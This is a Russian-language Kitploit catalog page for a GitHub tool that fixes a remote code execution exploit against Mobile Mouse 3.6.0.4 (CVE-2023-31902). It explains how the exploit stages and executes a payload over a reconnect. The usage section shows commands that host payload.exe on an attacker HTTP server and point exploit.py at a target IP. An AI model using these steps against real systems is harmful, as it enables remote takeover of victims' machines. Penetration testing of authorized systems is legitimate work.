Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/lypd0/mouseserver-exploit
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed Teaming
GitHublypd0/mouseserver-exploit

mouseserver-exploit

Mobile Mouse 3.6.0.4 - Удалённое выполнение кода - CVE-2023-31902

Репозиторий
111 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Mobile Mouse 3.6.0.4 RCE - Исправление

Исправленная версия эксплойта удалённого выполнения кода Mobile Mouse 3.6.0.4, опубликованного как EDB-51010.

Уязвимость

  • CVE: CVE-2023-31902
  • Затронутая версия: Mobile Mouse 3.6.0.4
  • Порт по умолчанию: TCP/9099

Что было исправлено

Исходный эксплойт успешно загружает полезную нагрузку, но может не выполнить её, поскольку обе стадии используют одно и то же TCP-соединение.

Эта версия:

  • Загружает полезную нагрузку через первую сессию
  • Ожидает завершения загрузки
  • Открывает новое соединение
  • Повторяет рукопожатие Mobile Mouse
  • Выполняет загруженную полезную нагрузку

Кроме того, в нём используются sendall(), корректно экранированные пути Windows, тайм-ауты сокетов и базовая обработка ошибок.

Использование

Запустите HTTP-сервер в каталоге с полезной нагрузкой:

root@kitploit:~
python3 -m http.server 8080

Запустите эксплойт:

root@kitploit:~
python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe

Отказ от ответственности

Этот проект предназначен только для авторизованного тестирования безопасности и образовательных исследований. Не используйте его против систем без явного разрешения.

Скачать инструмент